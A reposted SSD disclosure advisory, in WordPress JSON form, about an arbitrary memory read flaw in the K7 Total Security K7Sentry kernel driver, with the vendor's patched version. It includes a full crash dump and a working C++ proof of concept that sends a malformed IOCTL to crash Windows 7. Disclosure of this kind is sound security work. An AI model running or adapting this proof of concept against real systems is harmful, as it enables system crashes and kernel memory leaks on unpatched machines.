{"id":10045,"date":"2017-10-23T14:19:19","date_gmt":"2017-10-23T22:19:19","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/10\/23\/news-3818\/"},"modified":"2017-10-23T14:19:19","modified_gmt":"2017-10-23T22:19:19","slug":"news-3818","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/10\/23\/news-3818\/","title":{"rendered":"SSD Advisory \u2013 K7 Total Security Device Driver Arbitrary Memory Read"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Mon, 23 Oct 2017 10:31:38 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a crash found in K7 Total Security.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> K7 has released patches to address this vulnerability &#8211; K7TotalSecurity version 15.1.0.305.<\/p>\n<p><strong>Vulnerability details<\/strong><br \/> User-controlled input to the K7Sentry device is not sufficiently sanitized. It can be used to compare the contents of an arbitrary memory address with a fixed value, which in turn can be used to read the contents of arbitrary memory.<\/p>\n<p><strong>Crash 
report<\/strong><br \/> By sending an invalid kernel pointer, we can crash the K7 Total Security process, as shown here:<\/p>\n<div id=\"crayon-59ee6ae6d1839508112751\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">1: 
kd&gt; !analyze -v\n*******************************************************************************\n*                                                                             *\n*                        Bugcheck Analysis                                    *\n*                                                                             *\n*******************************************************************************\n\nPAGE_FAULT_IN_NONPAGED_AREA (50)\nInvalid system memory was referenced.  This cannot be protected by try-except,\nit must be protected by a Probe.  Typically the address is just plain bad or it\nis pointing at freed memory.\nArguments:\nArg1: f8f8f8f8, memory referenced.\nArg2: 00000000, value 0 = read operation, 1 = write operation.\nArg3: 88c93a63, If non-zero, the instruction address which referenced the bad memory\n\taddress.\nArg4: 00000002, (reserved)\n\nDebugging Details:\n------------------\n\n*************************************************************************\n***                                                                   ***\n***                                                                   ***\n***    Your debugger is not using the correct symbols                 ***\n***                                                                   ***\n***    In order for this command to work properly, your symbol path   ***\n***    must point to .pdb files that have full type information.      ***\n***                                                                   ***\n***    Certain .pdb files (such as the public OS symbols) do not      ***\n***    contain the required information.  Contact the group that      ***\n***    provided you with these symbols if you need this command to    ***\n***    work.                                                          ***\n***                                                                   ***\n***    Type referenced: kernel32!pNlsUserInfo                         ***\n***                                                                   ***\n*************************************************************************\n*************************************************************************\n***                                                                   ***\n***                                                                   ***\n***    Your debugger is not using the correct symbols                 ***\n***                                                                   ***\n***    In order for this command to work properly, your symbol path   ***\n***    must point to .pdb files that have full type information.      ***\n***                                                                   ***\n***    Certain .pdb files (such as the public OS symbols) do not      ***\n***    contain the required information.  Contact the group that      ***\n***    provided you with these symbols if you need this command to    ***\n***    work.                                                          ***\n***                                                                   ***\n***    Type referenced: kernel32!pNlsUserInfo                         ***\n***                                                                   ***\n*************************************************************************\n\nREAD_ADDRESS:  f8f8f8f8\n\nFAULTING_IP:\nK7Sentry+a63\n88c93a63 80384b          cmp     byte ptr [eax],4Bh\n\nMM_INTERNAL_CODE:  2\n\nIMAGE_NAME:  K7Sentry.sys\n\nDEBUG_FLR_IMAGE_TIMESTAMP:  54eda273\n\nMODULE_NAME: K7Sentry\n\nFAULTING_MODULE: 88c93000 K7Sentry\n\nDEFAULT_BUCKET_ID:  VISTA_DRIVER_FAULT\n\nBUGCHECK_STR:  0x50\n\nPROCESS_NAME:  poc.exey_0x950\n\nCURRENT_IRQL:  2\n\nTRAP_FRAME:  9a15ba14 -- (.trap 0xffffffff9a15ba14)\nErrCode = 00000000\neax=f8f8f8f8 ebx=001ffea0 ecx=00000000 edx=001ffe90 esi=9a15bac0 edi=00000010\neip=88c93a63 esp=9a15ba88 ebp=9a15badc iopl=0         nv up ei ng nz na pe nc\ncs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010386\nK7Sentry+0xa63:\n88c93a63 80384b          cmp     byte ptr [eax],4Bh         ds:0023:f8f8f8f8=??\nResetting default scope\n\nLAST_CONTROL_TRANSFER:  from 82aebe67 to 82a879d8\n\nSTACK_TEXT:\n9a15b564 82aebe67 00000003 bf4bd6ad 00000065 nt!RtlpBreakWithStatusInstruction\n9a15b5b4 82aec965 00000003 c0603e38 f8f8f8f8 nt!KiBugCheckDebugBreak+0x1c\n9a15b978 82a9a9c5 00000050 f8f8f8f8 00000000 nt!KeBugCheck2+0x68b\n9a15b9fc 82a4cf98 00000000 f8f8f8f8 00000000 nt!MmAccessFault+0x104\n9a15b9fc 88c93a63 00000000 f8f8f8f8 00000000 nt!KiTrap0E+0xdc\nWARNING: Stack unwind information not available. Following frames may be wrong.\n
9a15badc 82a43129 84a6c1f8 84d9fc30 84d9fc30 K7Sentry+0xa63\n9a15baf4 82c3b7af 00000000 84d9fc30 84d9fca0 nt!IofCallDriver+0x63\n9a15bb14 82c3eafe 84a6c1f8 84cdcd80 00000000 nt!IopSynchronousServiceTail+0x1f8\n9a15bbd0 82c85ac2 00000028 84d9fc30 00000000 nt!IopXxxControlFile+0x810\n9a15bc04 82a49db6 00000028 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\n9a15bc04 76f16c74 00000028 00000000 00000000 nt!KiSystemServicePostCall\n001ffdc8 76f1542c 7504ab4d 00000028 00000000 ntdll!KiFastSystemCallRet\n001ffdcc 7504ab4d 00000028 00000000 00000000 ntdll!NtDeviceIoControlFile+0xc\n001ffe2c 767fbbc5 00000028 9500286b 001ffe90 KERNELBASE!DeviceIoControl+0xf6\n001ffe58 00f51e42 00000028 9500286b 001ffe90 kernel32!DeviceIoControlImplementation+0x80\n001ffec4 00f57500 00000001 002a31b0 002a32c0 poc!wmain+0xe2 [e:k7_2016k7sentry_0x9500286b_win7_pock7sentry_0x9500286bmain.cpp @ 31]\n001fff0c 767fef8c 7ffd7000 001fff58 76f3367a poc!__tmainCRTStartup+0xfe [f:ddvctoolscrtcrtw32startupcrt0.c @ 255]\n001fff18 76f3367a 7ffd7000 76ec24f9 00000000 kernel32!BaseThreadInitThunk+0xe\n001fff58 76f3364d 00f5757d 7ffd7000 00000000 ntdll!__RtlUserThreadStart+0x70\n001fff70 00000000 00f5757d 7ffd7000 00000000 ntdll!_RtlUserThreadStart+0x1b\n\nSTACK_COMMAND:  kb\n\nFOLLOWUP_IP:\nK7Sentry+a63\n88c93a63 80384b          cmp     byte ptr [eax],4Bh<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\"><\/div>\n<\/div>\n<p><strong>Proof of Concept<\/strong><br \/> The PoC has been tested on Windows 7 x86.<\/p>\n<div id=\"crayon-59ee6ae6d1845461773164\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">#include &lt;Windows.h&gt;\n#include &lt;iostream&gt;\nusing namespace std;\n\nint wmain()\n{\n\t\/\/ Open a handle to the K7Sentry device.\n\tHANDLE hDevice = CreateFileW(L&quot;\\\\\\\\.\\\\K7Sentry&quot;, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);\n\n\tif(hDevice == INVALID_HANDLE_VALUE)\n\t{\n\t\tcout &lt;&lt; endl &lt;&lt; &quot;Failed accessing K7Sentry Device Driver. Error: &quot; &lt;&lt; dec &lt;&lt; GetLastError() &lt;&lt; endl;\n\t\tcin.get();\n\t\treturn 0;\n\t}\n\n\tBYTE dummyBuf[0x20];\n\tmemset(dummyBuf, 0, sizeof(dummyBuf));\n\n\t*(ULONG_PTR*)dummyBuf = 0xF8F8F8F8; \/\/INVALID KERNEL POINTER TO TRIGGER PAGE FAULT POC.\n\n\tcout &lt;&lt; endl &lt;&lt; &quot;Sending malformed IOCTL...&quot; &lt;&lt; endl;\n\n\tDWORD bytesReturned = 0;\n\n\tDeviceIoControl(hDevice, 0x9500286B, dummyBuf, sizeof(dummyBuf), dummyBuf, sizeof(dummyBuf), &amp;bytesReturned, NULL);\n\n\tcin.get();\n\treturn 0;\n}<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\"><\/div>\n<\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3435\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Mon, 23 Oct 2017 10:31:38 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a crash found in K7 Total Security. 
Credit An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program Vendor response K7 has released patches to address this vulnerability &#8211; K7TotalSecurity version 15.1.0.305 Vulnerability details User controlled input to K7Sentry device is not sufficiently sanitized, &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3435\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 K7 Total Security Device Driver Arbitrary Memory Read<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12135,10757],"class_list":["post-10045","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-information-disclosure","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10045","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10045"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10045\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10045"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10045"},{"taxonomy":"post_tag","
embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10045"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}